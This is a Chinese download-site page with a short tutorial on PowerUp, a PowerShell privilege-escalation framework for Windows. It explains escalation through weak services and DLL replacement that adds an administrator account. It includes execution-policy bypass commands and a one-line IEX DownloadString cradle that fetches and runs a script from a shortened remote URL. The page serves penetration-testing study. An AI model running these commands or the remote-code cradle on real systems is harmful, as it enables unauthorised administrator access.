ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全网络安全工具 → Powrshell Powerup 提权框架
Powrshell Powerup 提权框架

Powrshell Powerup 提权框架

评分:
下载地址
  • 软件介绍
  • 软件截图
  • 同类推荐
  • 相关文章

软件Tags: [db:tag]

通常,在Windows下面我们可以通过内核漏洞来提升权限,但是,我们常常会碰到所处服务器通过内核漏洞提权是行不通的,这个时候,我们就需要通过脆弱的Windows服务提权,比如我们替换掉服务所依赖的DLL文件,当服务重启时,加载我们替换的DLL文件从而完成比如添加管理员账号的操作。或者通过常见的Mssql,Mysql等服务,通过其继承的系统权限来完成提权等等,而今天我将介绍一个非常实用的Powershell框架-Powerup,此框架可以在内核提权行不通的时候,帮助我们寻找服务器脆弱点进而通过脆弱点实现提权的目的。
要使用Powerup,首先需要下载此脚本:Powerup,之后加载此脚本:

E:> powershell.exe -nop -exec bypass

PS E:\> Import-Module .\PowerUp.psm1

加载完成以后,便可以使用Powerup中的所有模块了。

通过如下命令可以查看所有模块:

Powrshell Powerup 提权框架

PS E:\> Get-Command -Module powerup

输入可以通过tab键来自动补全,如果要查看各个模块的详细说明,可以使用"Get-help [cmdlet] -full"来查看,比如"Get-Help Find-DLLHijack -full",如果要将输出的结果导出到一个文件可以使用Out-File,如下:

PS E:\> Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

上述命令使用了Invoke-AllChecks,脚本将会进行所有的检查

在cmd环境下,可以使用下列方式来运行该脚本:

E:\> powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1;

Invoke-AllChecks}"

如果你想在内存加载此脚本,可以用下列方式:

E:\> powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).

DownloadString('http://dwz.cn/2vkbfP'); Invoke-AllChecks"

除此之外,Metasploit上同样包含执行powershell脚本的模块exec_powershell.rb,通过此模块,可以通过msf会话来执行powershell。

展开内容

软件截图

下载地址

  • PC版

推荐文章

用户评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 蜀ICP备19039426号-2| 蜀ICP备19039426号-2

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网